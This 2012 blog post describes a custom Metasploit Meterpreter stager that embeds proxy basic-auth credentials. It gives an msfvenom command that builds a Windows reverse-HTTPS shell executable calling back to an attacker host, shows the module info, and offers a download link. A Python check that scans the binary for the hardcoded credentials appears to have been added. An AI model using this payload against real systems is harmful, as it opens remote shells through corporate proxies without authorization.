
Metasploit stager: reverse_https with basic authentication against proxy


1. Introduction

reverse_https does an amazing job of supporting proxy servers and NTLM authentication, but there are situations where the proxy server only handles basic authentication, and where you hold a valid username and password pair.

Unlike NTLM, the username and password used during basic authentication remain within the scope of the process (for example, in your browser after a successful authentication against the proxy server). This is why reverse_http(s) knows nothing about this password: instead, the reverse_http(s) stager uses the WinInet API and lets Windows manage how to reach the Internet.

Back to our basic authentication mechanism: this customized version of reverse_https lets you embed a valid username and password inside the payload, so that the stager can perform a proper basic authentication against the proxy server. The proxy settings (IP, port, proxy.pac, …) are still automatically managed by WinInet.

2. Usage example

2.1. EXE generation

msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \
  -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \
  PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe
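Because the proxy credentials are hardcoded into the generated executable, anyone who obtains that file can recover them. The following Python is an added check, not part of the module or this post: it scans a binary for the configured username and password in the forms such a string can take (plain ASCII, UTF-16LE as Windows APIs often expect, and the base64 "user:pass" token of a Proxy-Authorization: Basic header), so you can assess what an analyst holding the artifact would see. The sample bytes are constructed and stand in for a real file; the credentials are the ones from the msfvenom command above.

```python
import base64

def credential_forms(user: str, password: str) -> dict:
    """Byte patterns under which a hardcoded basic-auth credential can sit
    inside an artifact: plain strings, wide (UTF-16LE) strings, and the
    base64("user:pass") token carried in a Proxy-Authorization: Basic header."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {
        "user_ascii": user.encode(),
        "pass_ascii": password.encode(),
        "user_utf16le": user.encode("utf-16-le"),
        "pass_utf16le": password.encode("utf-16-le"),
        "basic_token": token.encode(),
    }

def find_all(blob: bytes, needle: bytes) -> list:
    """Every offset at which needle occurs in blob (overlaps included)."""
    offsets, start = [], 0
    while (idx := blob.find(needle, start)) != -1:
        offsets.append(idx)
        start = idx + 1
    return offsets

def find_embedded_credentials(blob: bytes, user: str, password: str) -> dict:
    """Return {form: [offsets]} for each credential form present in blob."""
    hits = {}
    for form, needle in credential_forms(user, password).items():
        found = find_all(blob, needle)
        if found:
            hits[form] = found
    return hits

# Constructed sample: a few stand-in bytes, not a real stager, with the
# credentials placed once as plain strings and once as a Basic token.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"mylongusername\x00mylongpassword123\x00"
    + b"\x00" * 8
    + b"Proxy-Authorization: Basic "
    + base64.b64encode(b"mylongusername:mylongpassword123") + b"\r\n"
)

if __name__ == "__main__":
    hits = find_embedded_credentials(SAMPLE, "mylongusername", "mylongpassword123")
    for form, offsets in hits.items():
        print(f"{form}: found at offsets {offsets}")
```

Run it against the real /tmp/msf.exe by replacing SAMPLE with the file's bytes; an empty result only means none of these three encodings matched, not that the credentials are absent.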

2.2. Module info

msf  > info payload/windows/meterpreter/reverse_https_proxy_basicauth

       Name: Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (proxy basic auth)
     Module: payload/windows/meterpreter/reverse_https_proxy_basicauth
    Version: 1, 15548, 14976
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 425
       Rank: Normal

Provided by:
  skape
  sf
  hdm

Basic options:
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
EXITFUNC         process          yes       Exit technique: seh, thread, process, none
LHOST                             yes       The local listener hostname
LPORT            8443             yes       The local listener port
PROXY_AUTH_PASS  pass123          yes       Proxy authentication (password)
PROXY_AUTH_USER  username         yes       Proxy authentication (username)

Description:
  Tunnel communication over HTTP using SSL, using hardcoded proxy auth 
  settings, Inject the meterpreter server DLL via the Reflective Dll 
  Injection payload (staged)

3. Download

Link: reverse_https_proxy_basicauth.tar.gz

Enjoy :)


© 2012, foip. All rights reserved.
